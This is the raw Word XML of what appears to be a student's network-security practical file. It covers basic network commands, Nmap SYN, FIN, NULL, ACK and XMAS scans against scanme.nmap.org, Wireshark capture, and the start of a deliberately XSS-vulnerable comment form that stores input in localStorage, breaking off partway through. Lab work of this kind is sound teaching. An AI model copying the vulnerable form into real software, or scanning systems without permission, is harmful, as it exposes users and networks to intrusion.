    <w:p w14:paraId="25BA577D" w14:textId="53E319D6" w:rsidR="00667DE9" w:rsidRDefault="005B10EF" w:rsidP="005B10E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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Using RC4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A62FA83" w14:textId="77777777" w:rsidR="005B10EF" w:rsidRPr="005B10EF" w:rsidRDefault="005B10EF" w:rsidP="005B10EF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78BB28D4" w14:textId="7C68A7E8" w:rsidR="00667DE9" w:rsidRPr="00170CF1" w:rsidRDefault="00C1753C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8100CE8" wp14:editId="11EB69E8">
            <wp:extent cx="5943600" cy="3327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45BA" w14:textId="77777777" w:rsidR="00667DE9" w:rsidRPr="00170CF1" w:rsidRDefault="00667DE9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F1BC05" w14:textId="77777777" w:rsidR="000C60E5" w:rsidRPr="00170CF1" w:rsidRDefault="000C60E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C708A5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A39376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5CD08A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B8FA39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645079" w14:textId="77777777" w:rsidR="000C60E5" w:rsidRPr="00170CF1" w:rsidRDefault="000C60E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6FFDC8" w14:textId="77777777" w:rsidR="000C60E5" w:rsidRPr="00170CF1" w:rsidRDefault="000C60E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7DAF7" w14:textId="77777777" w:rsidR="000C60E5" w:rsidRPr="00170CF1" w:rsidRDefault="000C60E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481292" w14:textId="77777777" w:rsidR="0051507C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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD2089" w14:textId="77777777" w:rsidR="00667DE9" w:rsidRPr="00170CF1" w:rsidRDefault="00667DE9" w:rsidP="00667DE9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Practical 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D61C22" w14:textId="5E9DB299" w:rsidR="0051507C" w:rsidRDefault="0051507C" w:rsidP="00456A70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170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aim: Using Traceroute, ping, ifconfig, netstat Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D98460" w14:textId="77777777" w:rsidR="005B10EF" w:rsidRPr="00170CF1" w:rsidRDefault="005B10EF" w:rsidP="00456A70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090221A4" w14:textId="4ECA6B15" w:rsidR="00667DE9" w:rsidRPr="005B10EF" w:rsidRDefault="005B10EF" w:rsidP="005B10EF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  <w:r w:rsidRPr="005B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Step 1: Ping all the IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1498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694CEC7F" wp14:editId="7C484D92">
            <wp:extent cx="4991100" cy="3724275"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="2857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24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E7551" w14:textId="10236F35" w:rsidR="00F24CBB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6E0824" w14:textId="6849C7BA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80133E" w14:textId="77033E68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7E0607" w14:textId="0EAD690D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A3E02E" w14:textId="32B3FD39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063532" w14:textId="4802E948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BC5AD4" w14:textId="54D6901B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634DD9" w14:textId="6F7CCEFF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1DF6D0" w14:textId="4413CB8C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749010" w14:textId="132CC02B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D4DD15" w14:textId="1C80B854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2C2657" w14:textId="55AA2608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81E408" w14:textId="20BFD20A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E97CBB" w14:textId="0148DD89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6779E7" w14:textId="538E9446" w:rsidR="005B10EF" w:rsidRPr="005B10EF" w:rsidRDefault="005B10EF" w:rsidP="005B10EF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B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2: run ipconfig/ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E783E2" w14:textId="7333A4DA" w:rsidR="00F24CBB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4088A68E" wp14:editId="4AB8423B">
            <wp:extent cx="5019675" cy="2488623"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="26035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 rotWithShape="1">
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="7790"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5019675" cy="24886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835CF" w14:textId="4B31AB61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888586" w14:textId="4CFD0E11" w:rsidR="005B10EF" w:rsidRPr="005B10EF" w:rsidRDefault="005B10EF" w:rsidP="00456A70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B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Step 3: run Netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBB5EAC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711EA4CC" wp14:editId="47D34E88">
            <wp:extent cx="5019675" cy="3314700"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="1905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28"/>
                    <a:srcRect b="8800"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5019675" cy="331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23215" w14:textId="6C5C3442" w:rsidR="00F24CBB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4DAA22" w14:textId="6CB6CB6F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A757F0" w14:textId="6817CA1A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5FD806" w14:textId="45C58667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A626C3" w14:textId="5F3D64D8" w:rsidR="005B10EF" w:rsidRPr="005B10EF" w:rsidRDefault="005B10EF" w:rsidP="00456A70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B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: run ARP command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0822A7" w14:textId="33FED067" w:rsidR="002362D2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3EA19277" wp14:editId="6D782F7D">
            <wp:extent cx="5037859" cy="3382241"/>
            <wp:effectExtent l="19050" t="19050" r="10795" b="2794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29"/>
                    <a:srcRect b="7534"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5044957" cy="3387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DBDAF" w14:textId="77777777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6FF06F" w14:textId="5C5BE789" w:rsidR="005B10EF" w:rsidRDefault="005B10EF" w:rsidP="00456A70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5B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">tracert </w:t>
      </w:r>
      <w:r w:rsidRPr="005B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE590C" w14:textId="7C09C6F9" w:rsidR="005B10EF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10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99A3D" wp14:editId="3A600CE1">
            <wp:extent cx="5124450" cy="2870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94F" w14:textId="77777777" w:rsidR="005B10EF" w:rsidRPr="00170CF1" w:rsidRDefault="005B10E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261E09" w14:textId="77777777" w:rsidR="002362D2" w:rsidRPr="00170CF1" w:rsidRDefault="00667DE9" w:rsidP="008D0F6F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Practical 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B100B" w14:textId="77777777" w:rsidR="002362D2" w:rsidRPr="00170CF1" w:rsidRDefault="008D0F6F" w:rsidP="00456A70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170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r w:rsidR="002362D2" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Using Nmap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, and XMAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F83487E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80E316" w14:textId="77777777" w:rsidR="002362D2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6464F546" wp14:editId="6A019444">
            <wp:extent cx="3657600" cy="2495550"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1905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8323" cy="2496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4B09D" w14:textId="77777777" w:rsidR="008D0F6F" w:rsidRPr="00170CF1" w:rsidRDefault="008D0F6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4846E8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SYN (Stealth) Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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BD5243F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Command: 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-p22,113,139 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADC694B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02503" w14:textId="77777777" w:rsidR="008D0F6F" w:rsidRPr="00170CF1" w:rsidRDefault="008D0F6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58ECF4" wp14:editId="32FB73F3">
            <wp:extent cx="4648200" cy="2897676"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="171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2-20 09265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318" cy="292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8917F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D291D3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 Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3311995" w14:textId="77777777" w:rsidR="008D0F6F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Command: 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sF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-T4 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAF1903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F3E32" w14:textId="77777777" w:rsidR="002362D2" w:rsidRPr="00170CF1" w:rsidRDefault="00423294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49CBF8" wp14:editId="41F94B60">
            <wp:extent cx="5077336" cy="2895600"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="190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2-20 09354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602" cy="2902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1ADD4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65132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NULL Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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9F5A0F7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Command: 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sN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–p 22 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2CE73E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00241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013584" wp14:editId="4D8E6776">
            <wp:extent cx="5215729" cy="2892056"/>
            <wp:effectExtent l="19050" t="19050" r="23495" b="2286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2-20 093902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3"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5244933" cy="2908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32B16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ACK -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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(TCP ACK scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A8E308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Command:    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-T4 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521A5CEF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6C0B0C" w14:textId="77777777" w:rsidR="00A230A5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6FC965" wp14:editId="5ECA6718">
            <wp:extent cx="4649638" cy="2863301"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="133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0035" cy="2888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0BD7A" w14:textId="77777777" w:rsidR="00A230A5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A1BD4D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E7ED7E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XMAS Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF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48ECF4A" w14:textId="77777777" w:rsidR="002362D2" w:rsidRPr="00170CF1" w:rsidRDefault="002362D2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Command: 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70CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B345E3" w14:textId="77777777" w:rsidR="008D0F6F" w:rsidRPr="00170CF1" w:rsidRDefault="008D0F6F" w:rsidP="00456A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D06E8" w14:textId="77777777" w:rsidR="002362D2" w:rsidRPr="00170CF1" w:rsidRDefault="008D0F6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6A9541" wp14:editId="5DCC8A06">
            <wp:extent cx="4735677" cy="2738005"/>
            <wp:effectExtent l="19050" t="19050" r="27305" b="2476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14898"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4740141" cy="27405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CC46" w14:textId="77777777" w:rsidR="008D0F6F" w:rsidRPr="00170CF1" w:rsidRDefault="008D0F6F" w:rsidP="008D0F6F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Practical 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FF52AC" w14:textId="77777777" w:rsidR="002362D2" w:rsidRPr="00170CF1" w:rsidRDefault="008D0F6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Aim: </w:t>
      </w:r>
      <w:r w:rsidR="002362D2" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Capturing and analyzing network packets</w:t>
      </w:r>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Wireshark (Fundamentals)</w:t>
      </w:r>
      <w:r w:rsidR="002362D2" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: - Identification the live network - Capture Packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251387FF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5510AF" w14:textId="77777777" w:rsidR="002362D2" w:rsidRPr="00170CF1" w:rsidRDefault="00170CF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1</w:t>
      </w:r>
      <w:r w:rsidR="002362D2" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:Install</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002362D2" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002362D2" w:rsidRPr="00170CF1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="002362D2" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6DFB9D" w14:textId="77777777" w:rsidR="008D0F6F" w:rsidRPr="00170CF1" w:rsidRDefault="008D0F6F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AA18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6350FB25" wp14:editId="183A3DA7">
            <wp:extent cx="4615132" cy="3398808"/>
            <wp:effectExtent l="19050" t="19050" r="14605" b="11430"/>
            <wp:docPr id="1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320" cy="3433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181F2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52FAD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3668CBA7" wp14:editId="1BFD1365">
            <wp:extent cx="4666891" cy="2268747"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="1778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4390" cy="2282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D6FA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239C40A4" wp14:editId="1857D6A0">
            <wp:extent cx="5037826" cy="3372928"/>
            <wp:effectExtent l="19050" t="19050" r="10795" b="18415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858" cy="3411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1554D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1239B9" w14:textId="77777777" w:rsidR="00F24CBB" w:rsidRPr="00170CF1" w:rsidRDefault="00170CF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12DDE112" wp14:editId="0B728997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5037455" cy="3096260"/>
            <wp:effectExtent l="19050" t="19050" r="10795" b="27940"/>
            <wp:wrapSquare wrapText="bothSides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09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D4460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74EC5E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9CB5A7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F1A9E7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0FBB6B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95A9B4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9C09DA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32B129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C337E0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437F3E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753276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1D908A" w14:textId="77777777" w:rsidR="00F24CBB" w:rsidRPr="00170CF1" w:rsidRDefault="002362D2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E3ED666" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRPr="00170CF1" w:rsidRDefault="002362D2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</w:t>
      </w:r>
      <w:r w:rsidR="00170CF1" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ractical 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3DFD9" w14:textId="77777777" w:rsidR="00F24CBB" w:rsidRPr="00170CF1" w:rsidRDefault="00170CF1" w:rsidP="00170CF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r w:rsidR="002362D2" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>: Simulate persistent cross-site scripting attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F44AD" w14:textId="77777777" w:rsidR="00A230A5" w:rsidRPr="00170CF1" w:rsidRDefault="00A230A5" w:rsidP="00170CF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F1A6735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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F6253C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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF457D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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7719AC51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&lt;title&gt;XSS Test App&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF48C73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&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BCD65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body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4577BB25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font-family: Arial;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5357E1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margin: 40px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F199F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5866BC28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input, button {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784D2ABC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padding: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D7731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margin: 5px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5982673E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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABFAA8F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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.comment</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FF2583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border: 1px solid #ccc;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484EEC4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padding: 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CB49E5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margin-top: 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE917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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F295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&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7161E7C3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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5405190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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629DFEAD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&lt;h2&gt;Comment Form (XSS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Vulnerable)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62402A95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&lt;form </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>onsubmit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>saveComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>); return false;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AE7A02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&lt;input type="text" id="comment" placeholder="Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8B7D71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comment"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2457FBF2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&lt;button type="submit"&gt;Submit&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E69269D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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FB3B9E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&lt;h3&gt;Comments:&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2AC30F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&lt;div id="output"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A0C2A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&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>="script.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75017F72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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55833099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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EC44E9" w14:textId="77777777" w:rsidR="00A230A5" w:rsidRPr="00170CF1" w:rsidRDefault="00A230A5" w:rsidP="00170CF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171C64A1" w14:textId="77777777" w:rsidR="00F24CBB" w:rsidRPr="00170CF1" w:rsidRDefault="00F24CBB" w:rsidP="00170CF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374D40FE" w14:textId="77777777" w:rsidR="00A230A5" w:rsidRPr="00170CF1" w:rsidRDefault="00A230A5" w:rsidP="00170CF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C31536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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>saveComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11704A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let comment = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170C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70CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>("comment").value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D9F27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// Save comment (persistent storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F4D99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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>localStorage.setItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>userComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>", comment);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F70A36D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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>displayComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
